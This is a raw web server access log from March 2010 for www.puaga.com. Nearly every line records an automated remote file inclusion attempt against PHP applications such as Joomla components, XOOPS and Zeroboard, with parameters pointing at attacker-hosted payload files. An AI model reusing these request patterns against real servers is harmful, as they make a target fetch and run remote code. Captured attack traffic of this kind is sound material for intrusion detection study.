210.116.103.96 - - [03/Mar/2010:07:28:40 -0800] "GET /logs/access_100221.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [03/Mar/2010:07:28:40 -0800] "GET /logs/access_100129.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:07:28:43 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:07:28:43 -0800] "GET /logs/access_100209.log%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:07:28:43 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:07:28:46 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:07:28:46 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:07:28:46 -0800] "GET /logs/access_100209.log%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.211 - - [03/Mar/2010:07:29:36 -0800] "GET /logs/access_100130.log%20%20//errors.php?error=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.211 - - [03/Mar/2010:07:29:36 -0800] "GET /logs//errors.php?error=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.211 - - [03/Mar/2010:07:29:36 -0800] "GET /errors.php?error=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.211 - - [03/Mar/2010:07:29:41 -0800] "GET /logs//errors.php?error=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.211 - - [03/Mar/2010:07:29:41 -0800] "GET /errors.php?error=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.211 - - [03/Mar/2010:07:29:41 -0800] "GET /logs/access_100130.log%20%20//errors.php?error=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.211 - - [03/Mar/2010:07:29:44 -0800] "GET /errors.php?error=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.211 - - [03/Mar/2010:07:29:44 -0800] "GET /logs//errors.php?error=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.211 - - [03/Mar/2010:07:29:44 -0800] "GET /logs/access_100130.log%20%20//errors.php?error=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [03/Mar/2010:07:30:24 -0800] "GET /logs/access_100219.log/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [03/Mar/2010:07:30:25 -0800] "GET /administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [03/Mar/2010:07:30:25 -0800] "GET /logs/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [03/Mar/2010:07:30:39 -0800] "GET /logs/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [03/Mar/2010:07:30:39 -0800] "GET /logs/access_100219.log%20%20/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [03/Mar/2010:07:30:39 -0800] "GET /administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [03/Mar/2010:07:30:59 -0800] "GET /logs/access_100224.log%20%20/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [03/Mar/2010:07:31:17 -0800] "GET /logs/access_100224.log/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [03/Mar/2010:07:31:28 -0800] "GET /administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [03/Mar/2010:07:31:28 -0800] "GET /logs/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [03/Mar/2010:07:31:28 -0800] "GET /logs/access_100219.log%20%20/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [03/Mar/2010:07:32:38 -0800] "GET /logs/access_100221.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [03/Mar/2010:07:32:48 -0800] "GET /logs/access_100129.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [03/Mar/2010:07:32:53 -0800] "GET /logs/access_100205.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:07:32:56 -0800] "GET /logs/access_100218.log/become_editor.php?theme_path=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:07:32:57 -0800] "GET /logs/access_100218.log/become_editor.php?theme_path=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:07:33:35 -0800] "GET /logs/access_100203.log/become_editor.php?theme_path=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:07:33:36 -0800] "GET /logs/access_100203.log/become_editor.php?theme_path=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [03/Mar/2010:07:34:34 -0800] "GET /logs/access_100203.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.174.73.50 - - [03/Mar/2010:07:35:14 -0800] "GET /logs/access_100219.log/Vuln/include/body.inc.php?content=http://www.holod-guru.com/excel/Tests/templates/kontol.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.833" "www.puaga.com"
79.174.73.50 - - [03/Mar/2010:07:35:15 -0800] "GET /Vuln/include/body.inc.php?content=http://www.holod-guru.com/excel/Tests/templates/kontol.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.833" "www.puaga.com"
79.174.73.50 - - [03/Mar/2010:07:35:15 -0800] "GET /logs/Vuln/include/body.inc.php?content=http://www.holod-guru.com/excel/Tests/templates/kontol.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.833" "www.puaga.com"
66.102.237.18 - - [03/Mar/2010:07:35:58 -0800] "GET /logs/access_100226.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [03/Mar/2010:07:35:58 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [03/Mar/2010:07:35:59 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [03/Mar/2010:07:36:10 -0800] "GET /logs/access_100226.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [03/Mar/2010:07:36:10 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [03/Mar/2010:07:36:10 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [03/Mar/2010:07:36:34 -0800] "GET /logs/access_100221.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [03/Mar/2010:07:36:38 -0800] "GET /logs/access_100221.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:07:36:40 -0800] "GET /logs/access_100209.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:07:36:53 -0800] "GET /logs/access_100209.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:07:37:33 -0800] "GET /_head.php?_zb_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:07:37:33 -0800] "GET /logs//_head.php?_zb_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:07:37:33 -0800] "GET /logs/access_100209.log%20%20//_head.php?_zb_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:07:38:38 -0800] "GET /logs/access_100217.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:07:38:40 -0800] "GET /logs/access_100217.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.255.116.109 - - [03/Mar/2010:07:38:43 -0800] "GET /_head.php?_zb_path=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.255.116.109 - - [03/Mar/2010:07:38:48 -0800] "GET /logs/access_100209.log%20%20//_head.php?_zb_path=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.255.116.109 - - [03/Mar/2010:07:38:49 -0800] "GET /logs//_head.php?_zb_path=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:07:39:26 -0800] "GET /logs/access_100209.log%20%20//_head.php?_zb_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:07:39:26 -0800] "GET /logs//_head.php?_zb_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:07:39:26 -0800] "GET /_head.php?_zb_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:07:39:33 -0800] "GET /_head.php?_zb_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:07:39:33 -0800] "GET /logs/access_100209.log%20%20//_head.php?_zb_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:07:39:33 -0800] "GET /logs//_head.php?_zb_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:40:47 -0800] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:40:52 -0800] "GET /logs/access.log//index.php?_SERVER[DOCUMENT_ROOT]=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:40:52 -0800] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:41:06 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:41:28 -0800] "GET /logs/access.log%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [03/Mar/2010:07:42:00 -0800] "GET /logs/access_100209.log//_head.php?_zb_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [03/Mar/2010:07:42:04 -0800] "GET /logs/access_100208.log//_head.php?_zb_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:42:13 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:42:13 -0800] "GET /logs/access.log%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:42:13 -0800] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:43:22 -0800] "GET /logs/access_100210.log%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.88.24.25 - - [03/Mar/2010:07:44:46 -0800] "GET /grader HTTP/1.1" 301 94 "-" "Yandex/1.01.001 (compatible; Win16; I)" "simple.puaga.com"
69.174.246.133 - - [03/Mar/2010:07:46:35 -0800] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.buddwriter.org/board/sc1? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.174.246.133 - - [03/Mar/2010:07:46:35 -0800] "GET /components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.174.246.133 - - [03/Mar/2010:07:46:35 -0800] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.174.246.133 - - [03/Mar/2010:07:46:35 -0800] "GET /logs/access_100220.log%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.174.246.133 - - [03/Mar/2010:07:46:35 -0800] "GET /logs/access_100220.log%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.174.246.133 - - [03/Mar/2010:07:46:35 -0800] "GET /components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.174.246.133 - - [03/Mar/2010:07:46:41 -0800] "GET /logs/access_100217.log%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.174.246.133 - - [03/Mar/2010:07:46:43 -0800] "GET /logs/access_100217.log%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.250.255.242 - - [03/Mar/2010:07:46:53 -0800] "GET /logs/access_091203.log HTTP/1.1" 404 5258 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.puaga.com"
212.227.119.61 - - [03/Mar/2010:07:47:51 -0800] "GET /logs/access_100217.log///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.227.119.61 - - [03/Mar/2010:07:47:51 -0800] "GET /logs///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.227.119.61 - - [03/Mar/2010:07:47:52 -0800] "GET //index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
174.37.143.198 - - [03/Mar/2010:07:48:39 -0800] "GET /logs/access_100219.log%20%20/Vuln/include/body.inc.php?content=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.143.198 - - [03/Mar/2010:07:48:39 -0800] "GET /logs/Vuln/include/body.inc.php?content=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.143.198 - - [03/Mar/2010:07:48:39 -0800] "GET /Vuln/include/body.inc.php?content=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.227.119.61 - - [03/Mar/2010:07:50:51 -0800] "GET /logs/access_100209.log///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.143.198 - - [03/Mar/2010:07:51:07 -0800] "GET /logs/access_100219.log/Vuln/include/body.inc.php?content=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.143.198 - - [03/Mar/2010:07:51:07 -0800] "GET /logs/Vuln/include/body.inc.php?content=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.143.198 - - [03/Mar/2010:07:51:07 -0800] "GET /Vuln/include/body.inc.php?content=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [03/Mar/2010:07:52:09 -0800] "GET /logs//nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [03/Mar/2010:07:52:11 -0800] "GET /nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [03/Mar/2010:07:52:11 -0800] "GET /logs//nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [03/Mar/2010:07:52:11 -0800] "GET /logs/access_100206.log%20%20//nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [03/Mar/2010:07:52:19 -0800] "GET /_head.php?_zb_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [03/Mar/2010:07:52:19 -0800] "GET /logs/access_100209.log//_head.php?_zb_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [03/Mar/2010:07:52:19 -0800] "GET /logs//_head.php?_zb_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [03/Mar/2010:07:52:30 -0800] "GET /logs/access_100208.log//_head.php?_zb_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [03/Mar/2010:07:52:54 -0800] "GET /logs/access_100206.log//nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [03/Mar/2010:07:52:54 -0800] "GET /logs//nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [03/Mar/2010:07:52:54 -0800] "GET /nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [03/Mar/2010:07:53:03 -0800] "GET /logs//nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [03/Mar/2010:07:53:03 -0800] "GET /logs/access_100206.log//nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [03/Mar/2010:07:53:03 -0800] "GET /nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [03/Mar/2010:07:53:30 -0800] "GET /logs/access_100202.log//nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [03/Mar/2010:07:53:36 -0800] "GET /logs/access_100202.log//nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [03/Mar/2010:07:54:12 -0800] "GET /logs/appserv/main.php?appserv_root=http://www.ruralcork.es/mailing/test.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.puaga.com"
77.240.113.151 - - [03/Mar/2010:07:54:12 -0800] "GET /appserv/main.php?appserv_root=http://www.ruralcork.es/mailing/test.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.puaga.com"
79.174.73.50 - - [03/Mar/2010:07:54:16 -0800] "GET /Vuln/include/body.inc.php?content=http://www.holod-guru.com/excel/Tests/templates/kontol.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.833" "www.puaga.com"
220.232.237.122 - - [03/Mar/2010:07:54:29 -0800] "GET /administrator/components/com_uhp/uhp_cofig.php?mosConfig_absolute_path=http://geba.de/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [03/Mar/2010:07:54:29 -0800] "GET /logs/administrator/components/com_uhp/uhp_cofig.php?mosConfig_absolute_path=http://geba.de/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [03/Mar/2010:07:54:29 -0800] "GET /logs/access_100224.log%20%20/administrator/components/com_uhp/uhp_cofig.php?mosConfig_absolute_path=http://geba.de/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [03/Mar/2010:07:54:30 -0800] "GET /logs/administrator/components/com_uhp/uhp_cofig.php?mosConfig_absolute_path=http://geba.de/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
